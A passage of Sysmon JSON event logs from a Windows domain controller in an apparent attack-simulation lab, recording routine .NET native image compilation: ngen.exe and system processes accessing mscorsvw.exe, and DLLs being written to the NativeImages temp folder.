08:04:00.273","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-00100A5E0A00}","TargetProcessId":"1248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6667,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:00.336\r\nProcessGuid: {41C8662E-21F0-5F25-0000-00100A5E0A00}\r\nProcessId: 1248\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4e0-0\\Accessibility.dll\r\nCreationUtcTime: 2020-08-01 08:04:00.336","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:00.336","ProcessGuid":"{41C8662E-21F0-5F25-0000-00100A5E0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4e0-0\\Accessibility.dll","CreationUtcTime":"2020-08-01 08:04:00.336","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6668,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.367\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-00103E610A00}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.367","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-00103E610A00}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6669,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.367\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-00103E610A00}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.367","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-00103E610A00}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6670,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.367\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-00103E610A00}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.367","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-00103E610A00}","TargetProcessId":"4568","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6671,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.554\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-001037650A00}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.554","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-001037650A00}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6672,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.554\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-001037650A00}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.554","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-001037650A00}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6673,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:00.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F0-5F25-0000-001037650A00}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:00.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F0-5F25-0000-001037650A00}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6674,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:01.929\r\nProcessGuid: {41C8662E-21F0-5F25-0000-001037650A00}\r\nProcessId: 2852\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b24-0\\Microsoft.VisualBasic.dll\r\nCreationUtcTime: 2020-08-01 08:04:01.929","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:01.929","ProcessGuid":"{41C8662E-21F0-5F25-0000-001037650A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b24-0\\Microsoft.VisualBasic.dll","CreationUtcTime":"2020-08-01 08:04:01.929","EventReceivedTime":"2020-08-01 08:04:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6675,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:01.992\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F1-5F25-0000-0010FA690A00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 